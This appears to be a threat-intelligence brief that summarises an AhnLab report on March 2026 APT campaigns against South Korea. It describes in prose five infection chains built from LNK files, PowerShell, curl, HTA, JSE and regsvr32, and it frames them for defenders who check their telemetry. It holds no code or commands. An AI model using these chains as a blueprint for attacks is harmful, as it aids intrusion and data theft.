Answer Brief
In March 2026, AhnLab observed South Korea-targeted APT attacks primarily using spear-phishing emails with LNK files to deploy malware via PowerShell, curl, HTA, and scripting chains, leading to info-stealers, keyloggers, and memory-resident backdoors.
Executive Summary: In March 2026, AhnLab observed South Korea-targeted APT attacks primarily using spear-phishing emails with LNK files to deploy malware via PowerShell, curl, HTA, and scripting chains, leading to info-stealers, keyloggers, and memory-resident backdoors.
Why It Matters
The AhnLab ASEC report on March 2026 APT activity in South Korea highlights a consistent reliance on social engineering via spear-phishing, with LNK files serving as the dominant initial infection vector. This aligns with broader trends in East Asia where trusted file formats are abused to bypass user suspicion and endpoint controls. The use of LNK files to launch PowerShell reflects a low-cost, high-efficacy technique that leverages legitimate system tools for malicious execution, reducing the need for custom packers or exploit chains.
Five distinct malware types (Types A-E) were identified, each demonstrating a different approach to payload delivery and persistence. Type A uses LNK-triggered PowerShell to download a copy of curl.exe, which then fetches and executes AutoIt malware, with persistence achieved through Windows Task Scheduler—a common but effective method for maintaining access without dropping obvious startup artifacts. This chain illustrates how attackers blend legitimate utilities (curl, PowerShell) with scripting languages (AutoIt) to evade detection.
Technical Signal
Type B attacks leverage the legitimate curl.exe binary to download malicious HTA files into the %TEMP% directory, which then deploy decoy documents alongside sys.dll-based info-stealers, keyloggers, and memory-resident backdoors. The use of HTA (HTML Application) files is notable for its ability to execute JavaScript and VBScript in a trusted context, often bypassing script execution restrictions. The inclusion of both info-stealing and keylogging capabilities suggests a dual focus on credential harvesting and long-term surveillance.
Type C represents a supply-chain-adjacent tactic, using Base64-encoded scripts to retrieve decoys and additional payloads from GitHub, specifically to distribute XenoRAT malware. This abuse of legitimate platforms like GitHub for malware hosting underscores the challenge of monitoring trusted developer infrastructure for malicious use, particularly when combined with encoding techniques that obscure content from simple signature-based detection.
Operational Impact
Type D employs a complex, multi-stage execution flow involving XML, VBS, PowerShell, BAT, and Python scripts to install a backdoor capable of remote command execution and file control. This diversity in scripting languages indicates a deliberate attempt to fragment the attack chain across different monitoring tools and logging systems, increasing the likelihood that at least one stage evades detection. The flexibility to control files and execute commands remotely suggests a focus on operational persistence rather than immediate data theft.
Type C and Type E both demonstrate advanced obfuscation and memory-based execution techniques. Type E uses JSE (JScript Encoded) files to drop malicious DLLs and decoys into %ProgramData%, then loads the DLL directly into memory via regsvr32.exe, avoiding disk-based detection of the malicious component. This reflects a growing trend in fileless or memory-only malware execution, which complicates traditional antivirus and endpoint detection and response (EDR) tools that rely on file scanning.
What To Watch
The report concludes that the ultimate goals of these campaigns are system control and information exfiltration via backdoors, info-stealers, and keyloggers. It emphasizes user vigilance against unsolicited emails and attachments, as well as the importance of maintaining updated operating systems, browsers, and security products. For US-based security teams monitoring South Korea or East Asia, this report provides actionable insight into TTPs commonly used in regional APT campaigns, particularly the abuse of LNK files, scripting chains, and legitimate binaries (curl, PowerShell, regsvr32) to achieve stealthy, persistent access.
The important editorial point is that this is a South Korea threat-landscape signal, not a claim that the same campaign has directly hit U.S. organizations. AhnLab ASEC is useful because it shows what local researchers are seeing in their own operating environment. U.S.-oriented readers should treat that as situational awareness for regional subsidiaries, suppliers, managed service providers, and partners rather than as a universal incident alert.
For monitoring teams, the first task is to preserve the source boundaries. The source item is titled "2026년 3월 APT 공격 동향 보고서(국내)", so the article should keep the report's local scope clear while translating the tactics, tooling, affected surfaces, and observed pattern into English. That makes the item useful without overstating victim geography or implying broader impact that the source did not document.
The practical value comes from comparison against internal telemetry. Teams with exposure in South Korea can check whether help-desk tickets, endpoint alerts, mail gateway detections, identity anomalies, blocked downloads, command-line activity, scheduled tasks, or suspicious script execution resemble the behaviors described by the source. A match does not prove attribution, but it can justify deeper triage.
This kind of regional report also helps separate durable monitoring themes from one-off news. If similar malware families, delivery chains, file types, infrastructure choices, or attacker workflows appear across later South Korea sources, the signal becomes stronger. Nogosee should keep those links visible in the tracker so readers can see whether a local report remains isolated or becomes part of a broader pattern.
Event Type: security
Importance: medium
Affected Companies
- AhnLab
Affected Sectors
- Critical Infrastructure
- Cybersecurity
- Government
Key Numbers
- MD5 hash samples cited: 5
- Malware types described: 5 (Types A-E)
- Attack vector prevalence: LNK files most common
Timeline
- AhnLab monitored APT attacks targeting South Korea
- Report published by ASEC/AhnLab
Frequently Asked Questions
What was the most common initial attack vector in South Korea-targeted APT campaigns in March 2026?
The most common initial attack vector was spear-phishing emails containing LNK (shortcut) files, which were used to trigger PowerShell execution and download further malware payloads.
What types of malware were delivered in the APT campaigns described in the AhnLab report?
The campaigns delivered AutoIt-based malware via curl.exe copies, malicious HTA files leading to info-stealers and keyloggers, Base64-encoded scripts from GitHub deploying XenoRAT, multi-stage XML/VBS/PowerShell/BAT/Python backdoors, and JSE-triggered DLLs loaded via regsvr32 for memory-resident backdoor functionality.
How did attackers achieve persistence in the Type A attack chain described in the report?
In Type A attacks, attackers used LNK files to execute PowerShell, which copied curl.exe to download and run AutoIt malware, then established persistence via Windows Task Scheduler.